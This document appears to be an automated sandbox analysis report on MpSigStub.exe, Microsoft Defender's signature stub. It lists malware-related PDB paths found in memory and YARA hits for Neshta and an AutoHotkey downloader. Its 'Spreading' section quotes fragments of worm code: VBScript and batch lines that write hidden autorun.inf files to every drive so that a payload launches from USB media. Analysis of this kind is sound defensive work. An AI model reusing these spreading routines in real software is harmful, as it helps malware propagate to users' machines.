Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000023.00000003.6312714800.0000028BD7136000.00000004.00000001.sdmp
Source:	Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb] source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: mqutil.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: \Release\kugou.pdb source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: mstscax.pdb source: MpSigStub.exe, 00000023.00000003.6329820715.0000028BD62A2000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp
Source:	Binary string: .+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp
Source:	Binary string: PicoTorrent.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \Minoral.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: msiexec.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: upE:\\WORK\\WORK_PECEPB\\Work_2012 Private\\.*\\Silence_lock_bot\\Silence_lock_bot\\Release\\Silence_lock_bot.pdb source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
Source:	Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: MpClient.pdb source: MpSigStub.exe, 00000023.00000003.6213576387.0000028BC3EA2000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
Source:	Binary string: wship6.pdb3 source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
Source:	Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp

Spreading:

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Autohotkey Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	Binary or memory string: autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: setaq=fso.getfile(status)iffso.fileexists(tmpt)thenfso.getfile(tmpt).attributes=0aq.copytmpt,truesetaq=fso.getfile(tmpt)aq.attributes=39anv=tmp+"\auto.exe"ifnotfso.fileexists(anv)thenaq.copyanvsetauto=fso.getfile(anv)auto.attributes=0setaut=fso.opentextfile(tmp+an,2,true,0)isi="[autorun]>open=wscript.exe//e:vbscriptthumb.dbauto>shell\open=open>shell\open\command=wscript.exe//e:vbscriptthumb.dbauto>shell\open\default=1>shell\explore=explore>shell\explore\command=wscript.exe//e:vbscriptthumb.dbauto
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: :\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: %s\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: :\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: %c:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: [Autorun]]
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: [autorun]d$open = autorun.exed4shellexecute = autorun.exed
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: %sautorun.inf
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: [autorun];
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: v[autorun];
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: deviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: adeviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: %sAutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: %s\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: [Autorun]d
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: 0echo[autorun]>"%1:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: 0echo[autorun]>"%1:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: g[autorun]open=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: %c:\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: 1shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: in(cdefghijklmnopqrstuvwxyz)doxcopy/h/y/r/kautorun.inf%%
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: f[autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: \|filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: [autorun]Open = action=Abrir carpeta para ver archivos
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: I[autorun]
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	Binary or memory string: SCPT:AutorunSCPT:Autorun.executeautorun.infSCPT:Autorun.execute.shopenSHELL\OPEN\COMMAND
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	Binary or memory string: nSCPT:Autorun.execute.shexec[autorun]action=open folder to view filesaction=abrir carpeta para ver los archivosshellexecute=icon=%systemroot%\system32\shell32.dll,4useautoplay=1[autorun]
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: autorun.infS
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: Autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF
